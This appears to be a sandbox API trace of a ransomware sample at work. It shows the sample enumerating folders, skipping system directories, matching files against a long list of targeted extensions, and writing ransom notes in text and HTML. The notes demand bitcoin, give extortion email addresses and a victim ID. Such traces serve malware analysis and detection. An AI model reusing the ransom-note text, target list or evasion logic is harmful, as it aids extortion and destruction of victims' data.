	[0173.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0173.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0173.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0173.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0173.998] FindNextFileW (in: hFindFile=0xfb9370, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.998] FindNextFileW (in: hFindFile=0xfb9370, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0173.998] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0173.999] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0173.999] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\"
	[0173.999] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml"
	[0173.999] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0173.999] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.999] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0173.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.000] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.000] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"
	[0174.000] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml") returned 109
	[0174.000] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.000] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0174.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.001] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0174.001] FindNextFileW (in: hFindFile=0xfb9370, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0174.001] FindClose (in: hFindFile=0xfb9370 | out: hFindFile=0xfb9370) returned 1
	[0174.001] FindClose (in: hFindFile=0xfb9370 | out: hFindFile=0xfb9370) returned 0
	[0174.002] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime"
	[0174.002] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*"
	[0174.002] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.002] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.002] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0174.002] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.003] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.003] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.006] CloseHandle (hObject=0x39c) returned 1
	[0174.007] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.008] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0174.020] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.020] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.021] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.021] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.021] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0174.021] CloseHandle (hObject=0x39c) returned 1
	[0174.022] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.022] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.022] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.023] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0174.023] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.027] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.027] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0174.031] CloseHandle (hObject=0x39c) returned 1
	[0174.032] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.032] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.033] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0174.034] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.034] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.035] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.035] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.035] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0174.035] CloseHandle (hObject=0x39c) returned 1
	[0174.036] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8141127e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb94b0
	[0174.036] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*") returned 97
	[0174.036] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.036] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*") returned 0x61
	[0174.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0174.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0174.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.037] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0174.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0174.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
